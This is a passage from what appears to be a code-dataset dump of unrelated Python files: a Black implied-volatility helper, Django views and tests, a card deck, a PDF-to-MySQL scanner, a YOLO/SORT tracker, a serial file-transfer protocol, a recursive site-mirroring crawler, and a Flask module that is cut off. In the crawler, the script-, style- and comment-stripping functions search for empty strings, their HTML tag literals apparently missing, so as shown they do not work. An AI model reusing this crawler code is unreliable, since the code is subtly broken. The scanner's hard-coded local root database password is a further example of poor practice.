k) + 0.5 * v * v * t) / (v * np.sqrt(t))\n return f * norm.pdf(d_1) * np.sqrt(t)\n\n#compute black implied volatility\ndef black_implied_vol(p, # option price, double\n f, # forward, double\n k, # strike, double\n t, # time to maturity, double\n c_or_p, # call (1) or put (-1), integer\n init_guess = 0.2 # initial guess\n ):\n\n f_ivol = lambda x: black_option_price(f, k, t, x, c_or_p) - p\n 
f_vega = lambda x: black_option_vega(f, k, t, x)\n    black_implied_vol = optimize.newton(f_ivol, init_guess, f_vega)\n\n    return black_implied_vol","sub_path":"finite_difference/black_analytics.py","file_name":"black_analytics.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"341084436","text":"from django.shortcuts import render, redirect\n\nfrom blog.forms import NewPostForm\nfrom blog.models import Post\n\n\ndef PostIndexView(request):\n    if request.method == 'POST':\n        fr = NewPostForm(request.POST)\n        if fr.is_valid():\n            fr.save()\n        # redirect even when the form is invalid, so the view always returns a response\n        return redirect('blog_urls:blog_url')\n    else:\n        posts = Post.objects.all().order_by('-created_date')\n        Form = NewPostForm()\n        return render(request, 'index.html', {'tPosts': posts, 'tForm': Form})\n","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"486885511","text":"class WrapKeyPoint(object):\n    def __init__(self, rect, Id,bboxId):\n        self.bboxId=bboxId\n        self.id=Id\n        self.rect = rect\n\n\nclass WrapBoundingBox(object):\n    def __init__(self, rect,cls,kpointCnt, kpointIds=None):\n        self.rect = rect\n        self.kpointIds={}\n        self.cls=cls\n        if kpointIds == None:\n            for i in range(kpointCnt):\n                self.kpointIds[i]=None\n        else:\n            self.kpointIds = kpointIds\n","sub_path":"Annotion.py","file_name":"Annotion.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"128300715","text":"# Django\nfrom django.test import TestCase\n\n# Python\nimport json\n\n# Django Rest Framework\nfrom rest_framework.test import APIClient\n\n# Models\nfrom movies.models import Movies\nfrom users.models import User\nfrom movies.models.comments import Comment\n\n\nclass TestSetUp(TestCase):\n\n    def setUp(self):\n        # Create model for user\n        user = User(\n            email='testing_login@cosasdedevs.com',\n            first_name='Testing',\n            last_name='Testing',\n            username='testing_login'\n        )\n        user.set_password('admin123')\n        user.save()\n\n        # Create model for movies\n        self.movie = Movies.objects.create(\n            name='titanic',\n            gender='AC',\n            author='leonardo',\n            production='netflix',\n            duration='01:30:00',\n            date_launch='1997-10-19',\n            user=user\n        )\n\n        self.movie = Movies.objects.create(\n            name='titanic 2.0',\n            gender='SE',\n            author='leonardo',\n            production='netflix',\n            duration='02:30:00',\n            date_launch='1977-10-19',\n            user=user\n        )\n\n        # Create model for comment\n        self.comment = Comment.objects.create(\n            user=user,\n            movie=self.movie,\n            description=\"sdfsdfsdfsdfdsfsdfdfsffsdf\"\n        )\n\n        # Login\n        client = APIClient()\n        response = client.post(\n            '/users/login/', {\n                'email': 'testing_login@cosasdedevs.com',\n                'password': 'admin123',\n            },\n            format='json'\n        )\n\n        result = json.loads(response.content)\n        self.access_token = result['access_token']\n        self.user = user\n\n        # Authentication\n        self.client = APIClient()\n        self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.access_token)\n\n        return super().setUp()","sub_path":"movies/test/test_setup.py","file_name":"test_setup.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"562302295","text":"import random\r\n#\r\n\r\nclass card_deck:\r\n\r\n    '''Creates a deck of cards based on the number of players; can deal a card\r\n    on request, passing the card reference and removing it from the deck'''\r\n\r\n    def __init__(self, number_of_players):\r\n        self.number_of_players = number_of_players\r\n\r\n        standard_pack = [\r\n            'H2', 'H3', 'H4', 'H5', 'H6', 'H7', 'H8', 'H9', 'H10', 'H11', 'H12',\r\n            'H13', 'H14', 'C2', 'C3', 'C4', 'C5', 'C6', 'C7', 'C8', 'C9', 'C10',\r\n            'C11', 'C12', 'C13', 'C14', 'D2', 'D3', 'D4', 'D5', 'D6', 'D7', 'D8',\r\n            'D9', 'D10', 'D11', 'D12', 'D13', 'D14', 'S2', 'S3', 'S4', 'S5', 'S6',\r\n            'S7', 'S8', 'S9', 'S10', 'S11', 'S12', 'S13', 'S14'\r\n        ]\r\n\r\n        number_of_packs = 1\r\n        current_deck = 52\r\n        cards_per_player = current_deck / self.number_of_players\r\n\r\n        while cards_per_player < 10:\r\n            current_deck = current_deck + 52\r\n            cards_per_player = current_deck / self.number_of_players\r\n            number_of_packs = int(current_deck / 52)\r\n\r\n        self.card_pack = []\r\n\r\n        for i in range(0, number_of_packs):\r\n            self.card_pack = self.card_pack + standard_pack\r\n\r\n    def deal_a_card(self):\r\n        if len(self.card_pack) != 1:\r\n            card_index = random.randint(0, len(self.card_pack)-1)\r\n            self.card_to_deal = self.card_pack[card_index]\r\n            del self.card_pack[card_index]\r\n        else:\r\n            self.card_to_deal = self.card_pack[0]\r\n\r\n        return self.card_to_deal\r\n","sub_path":"deck_unit.py","file_name":"deck_unit.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"472068194","text":"import PyPDF2 as pdf\r\nimport pandas as pd\r\nimport numpy as np\r\nimport pymysql\r\n\r\nconnection = pymysql.connect(host=\"localhost\", user=\"root\", password=\"toor\", db=\"Core\")\r\ncursor = connection.cursor()\r\n\r\nPDFfile = open(\"ABC COMPLETION LISTS.pdf\", \"rb\")\r\npdfRead = pdf.PdfFileReader(PDFfile)\r\n\r\nx = pdfRead.getPage(0)\r\n\r\ntext = x.extractText()\r\n\r\ndata = {'Floor':[],'Section':[], 'Unit':[], 'Date Complete':[], 'Contractor':[], 'Problem':[], 'Status':[]}\r\n\r\ndf = pd.DataFrame(data)\r\n\r\nsql1 = \"insert into organized(floor, section, unit, date_done, contractor, problem, status_check) values (%s, %s, %s, %s, %s, %s, %s)\"\r\n\r\n# floors: 1-4\r\n# section a-c\r\n# unit 440-454\r\n# problems:\r\n# •\tBR DOOR NEEDS PAINT\r\n# •\tPEEPHOLE NEEDED\r\n# •\tMAJOR CUTS IN DRYWALL\r\n# •\tVENT COVER\r\n# •\tDOORS NEEDING PAINT\r\n# •\tACCESS PANEL COVERS\r\n# •\tFART FAN\r\n# •\tSHOWER RODS\r\n# •\tACCESS PANEL COVERS\r\n# •\tKNEEBOARD NEEDS\r\n# •\tTRIM NEEDS PAINT\r\n# •\tOUTLET COVERS\r\n# •\tTHERMOSTAT\r\n# •\tSMOKE\r\n# •\tCARPET\r\n# •\tLIGHT IN KITCHEN\r\n\r\n\r\ninsert_data = ('440', 'N', 'N', 'BR DOOR NEEDS PAINT', 'Not', 'N')\r\n\r\n\r\n\r\n# each token must be tested with \"in text\" individually; a bare and-chain of\r\n# string literals only applies the \"in\" check to the last one\r\nif all(s in text for s in (\"ECTION\", \"A\", \"440\", \"BR DOOR NEEDS PAINT\", \"Floor\", \"4\")):\r\n    cursor.execute(sql1, insert_data)\r\n    connection.commit()\r\n\r\nelif all(s in text for s in (\"SECTION B\", \"461\", \"SMOKE MISSING\")):\r\n    data = {'Section': ['B'], 'Unit': ['440'], 'Date Complete': ['A'], 'Contractor': ['N/A'], 'Problem': ['1'], 'Status': ['N/A']}\r\n    df = pd.DataFrame(data)\r\n\r\nprint(df)","sub_path":"PreSQLScanner.py","file_name":"PreSQLScanner.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"450587118","text":"import os\nimport cv2\nimport time\nimport numpy as np\nfrom tqdm import tqdm\nimport imutils\nfrom sort import *  # SORT tracker; moved up from inside the frame loop below\n\nmemory = {}\nline = [(43, 543), (550, 655)]\ncounter = 0\nCOLORS = np.random.randint(0, 255, size=(200, 3),\n\tdtype=\"uint8\")\n\ndef intersect(A,B,C,D):\n\treturn ccw(A,C,D) != ccw(B,C,D) and ccw(A,B,C) != ccw(A,B,D)\n\n\ndef ccw(A,B,C):\n    print((C[1]-A[1]) * (B[0]-A[0]) > (B[1]-A[1]) * (C[0]-A[0]))\n\n    return (C[1]-A[1]) * (B[0]-A[0]) > (B[1]-A[1]) * (C[0]-A[0])\n\n# load the YOLO class labels\nlabelsPath = os.path.sep.join([\"yolo-coco\", \"coco.names\"])\nLABELS = open(labelsPath).read().strip().split(\"\\n\")\n\n#print(\"[INFO] loading YOLO from disk...\")\nweightsPath = os.path.sep.join([\"yolo-coco\", \"yolov3.weights\"])\nconfigPath = os.path.sep.join([\"yolo-coco\", \"yolov3.cfg\"])\n\nnet = cv2.dnn.readNetFromDarknet(configPath, weightsPath)\nln = net.getLayerNames()\nprint(ln)\nprint(net.getUnconnectedOutLayers())\nln = [ln[i[0] - 1] for i in net.getUnconnectedOutLayers()]\nprint(ln)\n\nvs = cv2.VideoCapture(\"input/highway.mp4\")\nwriter = None\n(W, H) = (None, None)\n\nframeIndex = 0\n\n(grabbed, frame) = vs.read()\n\nblob = cv2.dnn.blobFromImage(frame, 1 / 255.0, (416, 416),\n\t\tswapRB=True, crop=False)\n\nnet.setInput(blob)\n\nstart = time.time()\nlayerOutputs = net.forward(ln)\nend = time.time()\n\n# initialize the lists of detected bounding boxes, confidences and class IDs\nboxes = []\nconfidences = []\nclassIDs = []\n\ntry:\n\tprop = cv2.cv.CV_CAP_PROP_FRAME_COUNT if imutils.is_cv2() \\\n\t\telse cv2.CAP_PROP_FRAME_COUNT\n\ttotal = int(vs.get(prop))\n\tprint(\"[INFO] {} total frames in video\".format(total))\n\n# if an error occurs while finding the total number of frames in the video file\nexcept:\n\tprint(\"[INFO] could not determine # of frames in video\")\n\tprint(\"[INFO] no approx. completion time can be provided\")\n\ttotal = -1\n\ntracker = Sort()  # create the tracker once, so track IDs persist across frames\n\nfor i in tqdm(range(1, 600)):\n    # keep reading frames\n    (grabbed, frame) = vs.read()\n\n    # stop if no frame could be grabbed\n    if not grabbed:\n        break\n\n    # fill in the frame dimensions if they are not set yet\n    if W is None or H is None:\n        (H, W) = frame.shape[:2]\n\n    # build a blob (binary large object) from the input frame and run a forward pass.\n    # the YOLO detection pass yields bounding boxes and associated probabilities.\n    blob = cv2.dnn.blobFromImage(frame, 1 / 255.0, (416, 416),\n        swapRB=True, crop=False)\n    net.setInput(blob)\n    start = time.time()\n    layerOutputs = net.forward(ln)\n    end = time.time()\n\n    # initialize the lists of detected bounding boxes, confidences and class IDs\n    boxes = []\n    confidences = []\n    classIDs = []\n\n    # loop over each layer output\n    for output in layerOutputs:\n        # loop over each detection in the output\n        for detection in output:\n            # extract the class ID and confidence (probability) of the detection\n            scores = detection[5:]\n            classID = np.argmax(scores)\n            confidence = scores[classID]\n\n            # filter out weak predictions below the minimum probability\n            if confidence > 0.5:\n                # keeping in mind that YOLO actually returns the center (x, y)\n                # coordinates of the bounding box followed by its width and height,\n                # rescale the bounding box coordinates relative to the image size.\n                box = detection[0:4] * np.array([W, H, W, H])\n                (centerX, centerY, width, height) = box.astype(\"int\")\n\n                # use the center (x, y) to derive the top-left corner of the bounding box\n                x = int(centerX - (width / 2))\n                y = int(centerY - (height / 2))\n\n                # append the bounding box coordinates, confidences and class IDs\n                boxes.append([x, y, int(width), int(height)])\n                confidences.append(float(confidence))\n                classIDs.append(classID)\n\n    print(\"boxs: \",boxes)\n    print(\"confidences: \",confidences)\n\n    # apply non-maxima suppression to overlapping bounding boxes\n    idxs = cv2.dnn.NMSBoxes(boxes, confidences, 0.5, 0.3)\n\n    print(idxs.flatten())\n\n    dets = []\n    if len(idxs) > 0:\n        # loop over the indexes we are keeping\n        for i in idxs.flatten():\n            (x, y) = (boxes[i][0], boxes[i][1])\n            (w, h) = (boxes[i][2], boxes[i][3])\n            dets.append([x, y, x + w, y + h, confidences[i]])\n\n    np.set_printoptions(formatter={'float': lambda x: \"{0:0.3f}\".format(x)})\n    dets = np.asarray(dets)\n\n    tracks = tracker.update(dets)\n\n    boxes = []\n    indexIDs = []\n    
c = []\n    previous = memory.copy()\n    memory = {}\n\n    for track in tracks:\n        boxes.append([track[0], track[1], track[2], track[3]])\n        indexIDs.append(int(track[4]))\n        memory[indexIDs[-1]] = boxes[-1]\n\n    print(dets)\n    print(tracks)\n    print(\"box : \",boxes)\n    print(\"ID : \",indexIDs)\n    print(\"memory : \",memory)\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"442248871","text":"import threading\nimport time\nimport sys\nimport serial\nfrom threading import Timer\nimport random\nimport os\n\nCOM_PORT = \"COM30\"\nREAD_FILE_NAME = \"thread_test.py\"\nFTP_HEADER = bytes.fromhex(\"F3 00 5E 01\")\nFTP_END = bytes.fromhex(\"F3 00 5E 01\")\n\nSTORE_FILE_NAME = \"/flash/main.py\"\n# STORE_FILE_NAME = \"/music/Superm.wav\"\n# STORE_FILE_NAME = \"/flash/main.py\"\n# READ_FILE_NAME = \"modnetwork.c\"\n# READ_FILE_NAME = \"main.c\"\n# READ_FILE_NAME = \"32bit_crc_test.txt\"\n# READ_FILE_NAME = \"mb_factory_V11.py\"\nFILE_BLOCK_SIZE = 200\n\nframe_header_str = \"F3\"\nframe_end_str = \"F4\"\nprotocol_id_str = \"01\"\ndev_id_str = \"00\"\nsrv_id_str = \"5E\"\nfile_header_cmd_id_str = \"01\"\nfile_block_cmd_id_str = \"02\"\nfile_state_cmd_id_str = \"F0\"\nfile_type_str = \"88\"\n\nFRAME_HEAD = 0xF3\nFRAME_END = 0xF4\nDEV_ID = 0x00\nSRV_ID = 0x5E\nCMD_STATE_ID = 0xF0\n\nFTP_FSM_HEAD_S = 0\nFTP_FSM_HEAD_CHECK_S = 1\nFTP_FSM_LEN1_S = 2\nFTP_FSM_LEN2_S = 3\nFTP_FSM_DATA_S = 4\nFTP_FSM_CHECK_S = 5\nFTP_FSM_END_S = 6\n\ncondition = threading.Condition()\n\n# ------------------------ start ----------------------------------------------------------\nser = serial.Serial( COM_PORT, 115200 )\n\n# This function takes an int and returns whether it is a printable character\ndef is_display( c ):\n\tif ( 0x20 <= c and c <= 0x7E ):\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef print_bytes_hex( bytes_data ):\n\tprint( \":\".join( \"{:02x}\".format(c) for c in bytes_data ) )\n\ndef bytes_to_hex_str( bytes_data ):\n\treturn \" \".join( \"{:02x}\".format(c) for c in bytes_data )\n\n# data is a bytearray\n# return is an int\ndef calc_xor( data ):\n\tret = 0\n\tfor c in data:\n\t\tret = ret ^ c\n\treturn ret\n\ndef calc_add_checksum( data ):\n\tret = 0\n\tfor c in data:\n\t\tret = ret + c\n\treturn ret & 0xFF\n\ndef calc_32bit_xor( data ):\n\tbytes_len = len( data )\n\t# data_bytes = bytes( data, encoding = 'utf-8' )\n\tdata_bytes = bytes( data )\n\t# print_bytes_hex( data_bytes )\n\t# print( bytes_len/4 )\n\t# print( int(bytes_len/4) )\n\tchecksum = bytearray.fromhex( \"00 00 00 00\" )\n\tfor i in range(int(bytes_len/4)):\n\t\tchecksum[0] = checksum[0] ^ data_bytes[i*4 + 0]\n\t\tchecksum[1] = checksum[1] ^ data_bytes[i*4 + 1]\n\t\tchecksum[2] = checksum[2] ^ data_bytes[i*4 + 2]\n\t\tchecksum[3] = checksum[3] ^ data_bytes[i*4 + 3]\n\n\tif ( bytes_len%4 ):\n\t\tfor i in range( bytes_len%4 ):\n\t\t\tchecksum[0+i] = checksum[0+i] ^ data_bytes[4*int(bytes_len/4) + i]\n\n\tprint_bytes_hex( checksum )\n\treturn checksum\n\ndef get_file_len( file_name ):\n\t# read file \n\t# f = open( file_name, 'r' )\n\t# f_d = f.read()\n\t# f_len = len(f_d)\t\n\t# f.close()\n\treturn os.path.getsize( file_name )\t# was os.path.getsize( \"./file_name\" ), which looked up a literal path\n\ndef send_task():\n\twhile( True ):\n\t\t#ser.write( \"abcd\".encode('utf-8') )\n\t\t#ser.write( b'\\xF3\\x00\\x01\\x02\\x03\\xff\\xab' )\n\t\t#ser.write( bytes.fromhex(\"F3 00 5E 01\") )\n\t\t#print( \"abcd\".encode('utf-8') )\n\t\t#ser.write( \"abcd\".encode('utf-8') )\n\t\tsend_file( ser, 
READ_FILE_NAME, 0 )\n\t\t# end_time = time.time()\n\t\t# print( \"Total time : %d second\"%( end_time - start_time ), \"avg tx speed: %d\"% ( get_file_len( READ_FILE_NAME ) ) )\n\t\t# time.sleep(5)\n\t\tbreak\n\ndef send_file( ser, file_name, file_type ):\n\t# read file \n\tf = open( file_name, 'rb' )\n\tf_d = f.read()\n\tf_len = len(f_d)\n\n\t# send file header\n\twhile( True ):\n\t\tcmd_len_str = bytes_to_hex_str( (0x09 + len(STORE_FILE_NAME)).to_bytes( 2, byteorder='little' ) )\n\t\tfile_size_str = bytes_to_hex_str( f_len.to_bytes(4, byteorder='little') )\n\t\tfile_checksum_str = bytes_to_hex_str( calc_32bit_xor( f_d ) )\n\t\tfile_name_str = bytes_to_hex_str( bytes( STORE_FILE_NAME, encoding = 'utf-8' ) )\n\t\tframe_data_str = protocol_id_str + \" \" + dev_id_str + \" \" + srv_id_str + \" \" + file_header_cmd_id_str + \" \" + cmd_len_str + \" \" + file_type_str + \" \" + file_size_str + \" \" + file_checksum_str + \" \" + file_name_str;\n\t\tframe_data_len = len( bytes.fromhex(frame_data_str) )\n\t\tframe_data_len_str = bytes_to_hex_str( (frame_data_len).to_bytes( 2, byteorder='little' ) )\n\t\tframe_head_checkusum_str = bytes_to_hex_str( calc_add_checksum( bytes.fromhex( frame_header_str+frame_data_len_str ) ).to_bytes(1, byteorder='little' ) )\n\t\tframe_checksum_str = bytes_to_hex_str( calc_add_checksum( bytes.fromhex( frame_data_str ) ).to_bytes(1, byteorder='little' ) )\n\t\t\n\t\tsend_head_str = frame_header_str + \" \" + frame_head_checkusum_str + \" \" + frame_data_len_str + \" \" + frame_data_str + \" \" + frame_checksum_str + \" \" + frame_end_str\n\t\tprint( send_head_str )\n\t\t\n\t\tser.write( bytes.fromhex( send_head_str) )\n\t\tcondition.acquire()\n\t\tif ( condition.wait( 5 ) ):\n\t\t\tprint( \"send file header ok\" )\n\t\t\tbreak;\n\t\telse:\n\t\t\tprint( \"send file header err\" )\n\n\t# wait for respond\n\n\t# send file block\n\tstart_time = time.time()\n\tfile_offset = 0\n\twhile ( file_offset < f_len ):\n\t\tprint( \"==== %% %f\"%(100*file_offset/f_len) )\n\t\tif ( (file_offset + FILE_BLOCK_SIZE) < f_len ):\n\t\t\tsend_file_size = FILE_BLOCK_SIZE\n\t\telse:\n\t\t\tsend_file_size = f_len - file_offset\n\n\t\tfile_offset_str = bytes_to_hex_str( file_offset.to_bytes( 4, byteorder='little' ) )\n\t\tcmd_len_str = bytes_to_hex_str( (0x04 + send_file_size).to_bytes( 2, byteorder='little' ) )\n\t\t# file_block_str = bytes_to_hex_str( bytes( f_d[file_offset:file_offset+send_file_size], encoding='utf-8' ) )\n\t\tfile_block_str = bytes_to_hex_str( bytes( f_d[file_offset:file_offset+send_file_size] ) )\n\t\tframe_data_str = protocol_id_str + \" \" + dev_id_str + \" \" + srv_id_str + \" \" + file_block_cmd_id_str + \" \" + cmd_len_str + \" \" + file_offset_str + \" \" + file_block_str;\n\t\tframe_data_len = len( bytes.fromhex(frame_data_str) )\n\t\tframe_data_len_str = bytes_to_hex_str( (frame_data_len).to_bytes( 2, byteorder='little' ) )\n\t\tframe_head_checkusum_str = bytes_to_hex_str( calc_add_checksum( bytes.fromhex( frame_header_str+frame_data_len_str ) ).to_bytes(1, byteorder='little' ) )\n\t\tframe_checksum_str = bytes_to_hex_str( calc_add_checksum( bytes.fromhex( frame_data_str ) ).to_bytes(1, byteorder='little' ) )\n\n\t\tsend_block_str = frame_header_str + \" \" + frame_head_checkusum_str + \" \" + frame_data_len_str + \" \" + frame_data_str + \" \" + frame_checksum_str + \" \" + frame_end_str\n\t\t# print( send_block_str )\n\t\t# random product err\n\t\tsend_block_bytes = bytearray.fromhex( send_block_str);\n\t\t\n\t\t\n\t\t#if ( 5 == random.randint( 1, 10 ) 
):\n\t\t#\tprint( \"---->ERR send\" )\n\t\t#\tsend_block_bytes[ random.randint(0, bytes.fromhex(cmd_len_str)[0] + 6) ] += 1\n\n\t\tser.write( send_block_bytes )\n\n\t\tcondition.acquire()\n\t\tif ( condition.wait( 1 ) ):\n\t\t\tfile_offset = file_offset + send_file_size\n\t\telse:\n\t\t\tprint( \"&&&&&&&&&&& Resend a block\" )\n\t\t\ttime.sleep( 5 )\n\t\t\tcontinue\n\t\t\t\n\n\tprint( \"===============================================================================================\" )\n\tprint( \">>>>>> Spend time : %d second\"%( time.time() - start_time ), \"avg tx speed: %d\"% (file_offset/(time.time() - start_time)) )\n\tprint( \">>>>>> Total cnt %d\"%f_len )\n\tprint( \"===============================================================================================\" )\n\n\t# time.sleep( 1 )\n\t# print( \"DTR False >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\" )\n\t# ser.setDTR( False )\n\t# time.sleep( 0.1 )\n\t# print( \"DTR True >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\" )\n\t# ser.setDTR( True )\n\n\tf.close()\n\n# end of send_file\n\nclass FtpFsm( object ):\n\tdef __init__( self ):\n\t\tself.__state = FTP_FSM_HEAD_S\n\t\tself.__buf = []\n\t\tself.__data_len = 0\n\t\tself.__cur_data_len = 0\n\t\tself.__checksum = 0x00\n\t\tself.__headchecksum = 0x00\n\t\tself.__recv_head_checksum = 0x00\n\n\tdef get_state( self ):\n\t\treturn self.__state\n\n\tdef set_state( self, s ):\n\t\tself.__state = s\n\n\tdef push_char( self, c ):\n\t\tif ( FTP_FSM_HEAD_S == self.__state ):\n\t\t\tif ( FRAME_HEAD == c ):\n\t\t\t\tself.__state = FTP_FSM_HEAD_CHECK_S\n\t\t\t\tself.__buf.clear()\n\t\t\t\tself.__checksum = 0\n\t\t\t\tself.__headchecksum = c\n\n\t\telif ( FTP_FSM_HEAD_CHECK_S == self.__state ):\n\t\t\tself.__recv_head_checksum = c\n\t\t\tself.__state = FTP_FSM_LEN1_S\n\n\t\telif( FTP_FSM_LEN1_S == self.__state ):\n\t\t\tself.__headchecksum += c\n\t\t\tself.__data_len = c\n\t\t\tself.__state = FTP_FSM_LEN2_S\n\n\t\telif( FTP_FSM_LEN2_S == self.__state ):\n\t\t\tself.__headchecksum += c\n\t\t\tif ( self.__headchecksum == self.__recv_head_checksum ):\n\t\t\t\tself.__data_len += c*0x100\t# high byte of the little-endian length; was c*0xff, an off-by-c bug\n\t\t\t\tself.__state = FTP_FSM_DATA_S\n\t\t\telse:\n\t\t\t\tself.__state = FTP_FSM_HEAD_S\n\n\t\telif( FTP_FSM_DATA_S == self.__state ):\n\t\t\tself.__checksum += c\n\t\t\tself.__buf.append( c )\n\t\t\tif ( len(self.__buf) == self.__data_len ):\n\t\t\t\tself.__state = FTP_FSM_CHECK_S\n\t\t\t\t# print( \"expect checksum %02x\"%(self.__checksum & 0xFF) )\n\n\t\telif( FTP_FSM_CHECK_S == self.__state ):\n\t\t\tif ( (self.__checksum & 0xFF) == c ):\n\t\t\t\tself.__state = FTP_FSM_END_S\n\t\t\telse:\n\t\t\t\tself.__state = FTP_FSM_HEAD_S\n\t\t\t\t\n\t\telif( FTP_FSM_END_S == self.__state ):\n\t\t\tif ( FRAME_END == c ):\n\t\t\t\tself.__state = FTP_FSM_HEAD_S\n\t\t\t\treturn self.__buf\n\t\t\telse:\n\t\t\t\tself.__state = FTP_FSM_HEAD_S \n\n\tdef clear_buf( self ):\n\t\tself.__buf.clear()\n\n\tdef get_buf( self ):\n\t\treturn self.__buf\n\nftp_fsm = FtpFsm()\n\n# clear all the data in serial buffer\ntime.sleep( 1 )\nser.read( ser.inWaiting() )\ntime.sleep( 2 )\nt = threading.Thread(target = send_task)\nt.start()\n\nwhile( True ):\n\tif ( ser.inWaiting() ):\n\t\tr_b = ser.read( ser.inWaiting() )\n\t\tfor c in r_b:\n\t\t\tprint( \"%c\"%(c), end='' )\n\t\t\tbuf_list = ftp_fsm.push_char( c )\n\t\t\tif ( type(buf_list) == list ):\n\t\t\t\tprint( \" #################################### \" )\n\t\t\t\tprint( buf_list )\n\t\t\t\t# protocol id is 0x01 and command status 
code is 0x00\n\t\t\t\tif ( 0x01 == buf_list[0] and 0x00 == buf_list[6] ):\n\t\t\t\t\tcondition.acquire()\n\t\t\t\t\tcondition.notify( 1 )\n\t\t\t\t\tcondition.release()\n\t\t\t\t\tpass\n\t\t\t\tftp_fsm.clear_buf()\n\t\t\t#if ( is_display(c) ):\n\t\t\t#\tprint( \"%c\"%(c), end='' )\n\t\t\t#else:\n\t\t\t#\tprint( \"%02x\"%(c), end=' ' )\n\nprint( \"***********************************************************************\" )\n\n# t.stop()\n","sub_path":"api_test_script/V1.1_thread_test/comm_protocol.py","file_name":"comm_protocol.py","file_ext":"py","file_size_in_byte":9674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"447032958","text":"from http.client import HTTPConnection, HTTPSConnection\nfrom os import getcwd, makedirs\nfrom os.path import dirname, exists, isdir, isfile\nfrom argparse import ArgumentParser\n\ncwd = getcwd() # We will output to cwd.\nEXCLUDED_EXTS = ['png', 'jpg', 'jpeg', 'gif', 'svg', 'css'] # These won't hold any links.\nbeen_there = []\n\n\ndef seperate(url):\n '''\n :param url: The whole url, for example 'https://www.somedomain.com/index.html'\n :return: A tuple containing the hostname, and the file to GET. For the above example: ('https://www.somedomain.com', '/index.html')\n '''\n parts = url.split('/')\n while '' in parts:\n parts.remove('') # Remove any empty strings.\n return '//'.join(parts[:2]), '/' + '/'.join(\n parts[2:]) # '//'.join(['https:', 'somedomain.com']), '/' + '//'.join(['index.html'])\n\n\ndef read_body(response):\n '''\n :param response: A HTTPResponse object.\n :return: The bytes of the response' body.\n '''\n body = b''\n buff = response.read(50) # Read 50 at a time\n while len(buff) > 0:\n body += buff\n buff = response.read(50)\n return body\n\n\ndef write_to_file(body, get, host):\n '''\n :param body: The bytes to write.\n :param get: The file's path, relative to cwd.\n :return: None\n '''\n host = host.replace('http://', '').replace('https://', '')\n if get == '/':\n get += 'index.html'\n get += '_[file]'\n dir = dirname(cwd + '/' + host + get)\n if not exists(dir):\n makedirs(dir)\n f = open(cwd + '/' + host + get, 'wb')\n f.write(body)\n f.close()\n\n\ndef unjsify(body):\n '''\n :param body: HTML document as a string.\n :return: The HTML document without JS blocks.\n '''\n start = 0\n while True:\n start = body.find('', start) + 1\n start = body.find('', end)\n if start < 0:\n break\n body = body[:end] + body[start:]\n return body\n\n\ndef uglify(body):\n '''\n :param body: HTML document as a string.\n :return: The HTML document without CSS blocks.\n '''\n start = 0\n while True:\n start = body.find('', start) + 1\n start = body.find('', end)\n if start < 0:\n break\n body = body[:end] + body[start:]\n return body\n\n\ndef uncomment(body):\n '''\n :param body: HTML document as a string.\n :return: The HTML document with the comments removed.\n '''\n start = 0\n while True:\n start = body.find('', start)\n body = body[:start] + body[end + 1:]\n start = end\n return body\n\n\ndef parse(body, host):\n body = uncomment(uglify(unjsify(body.decode())))\n result = []\n start = 0\n while True:\n start = body.find('href', start)\n if start < 0:\n break\n end = body.find('\"', start)\n start = body.find('\"', end + 1)\n result.append(body[end + 1:start])\n start = 0\n while True:\n start = body.find('src', start)\n if start < 0:\n break\n end = body.find('\"', start)\n start = body.find('\"', end + 1)\n result.append(body[end + 1:start])\n for i in range(len(result)):\n if '&#' not in 
result[i] and 'http://' not in result[i] and 'https://' not in result[i]:\n result[i] = host + '/' + result[i]\n return result\n\n\ndef process(response, get, host):\n '''\n :param response: A HTTPResponse object.\n :param get: The asset it was supposed to get.\n :return: A list of links to step into.\n '''\n body = read_body(response)\n write_to_file(body, get, host)\n ext = get.split('.')[::-1][0]\n if ext.lower() in EXCLUDED_EXTS:\n return []\n try:\n return parse(body, host)\n except UnicodeDecodeError:\n return []\n\n\ndef step(url):\n '''\n :param url: The whole url to recoursively GET.\n :return: None\n '''\n if url in been_there:\n return\n been_there.append(url)\n if not '://' in url[0:8]: # Assume http://\n url = 'http://' + url\n host, get = seperate(url)\n print('GETting', get, 'from', host)\n con = HTTPSConnection(host[8:], timeout=10) if host[0:5] == 'https' else HTTPConnection(host[7:],\n timeout=10) # Make the connection\n try:\n con.request('GET', get)\n except:\n print('Unable to GET', get)\n return\n response = con.getresponse()\n for result in process(response, get, host):\n step(result)\n\nparser = ArgumentParser()\nparser.add_argument('url', help='The URL to start from')\nparser.add_argument('-o', '--output', help='The directory to output to')\nargs = parser.parse_args()\n\nif args.output:\n cwd = args.output\nstep(args.url)","sub_path":"slither.py","file_name":"slither.py","file_ext":"py","file_size_in_byte":4964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"324154681","text":"import os\nimport pickle\nfrom redis import Redis\nfrom rq import Queue, Worker\nimport click\nfrom flask.cli import with_appcontext\nfrom inf5190.services import perform_request, ApiError\nfrom inf5190.model.productModel import Product\nfrom inf5190.model.orderModel import Order\nfrom inf5190.model.productOrderModel import ProductOrder\nfrom inf5190.model.shippingInfoModel import 